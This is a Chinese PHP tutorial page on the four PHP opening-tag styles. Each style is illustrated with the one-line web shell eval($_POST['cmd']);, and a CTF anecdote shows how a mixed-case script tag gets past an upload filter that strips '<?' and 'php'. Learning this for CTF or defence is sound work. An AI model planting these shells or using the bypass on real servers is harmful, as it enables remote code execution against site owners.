当前位置:Gxlcms > PHP教程 > PHP的标识有哪几种

PHP的标识有哪几种

时间:2021-07-01 10:21:17 帮助过:30人阅读

PHP的标识有4种风格

XML风格 (推荐学习:PHP视频教程)

<?php
eval($_POST['cmd']); 
?>

php推荐使用的标记风格。

服务器管理员无法禁用,所有服务器上均可使用该风格。

脚本风格

<script language="php">
    eval($_POST['cmd']);
</script>

默认开启,无法禁用

笔者曾遇到过一CTF题目,要求上传shell,但是却对文件内容做了过滤 ,<? 以及 php,替换为了空格。此种风格中,language的值,大小写都可以,因此可以构造如下代码进行绕过

<script language="PhP">
    eval($_POST['cmd']);
</script>

简短风格

<? 
eval($_POST['cmd']);
?>

此种风格需要在配置文件php.ini中启用short_open_tage选项

此种风格在许多环境中默认是不支持的

ASP风格

<% 
eval($_POST['cmd']);
%>

此种风格需要在配置文件php.ini中启用asp_tag选项

在默认情况下是禁用的

以上就是PHP的标识有哪几种的详细内容,更多请关注Gxlcms其它相关文章!

人气教程排行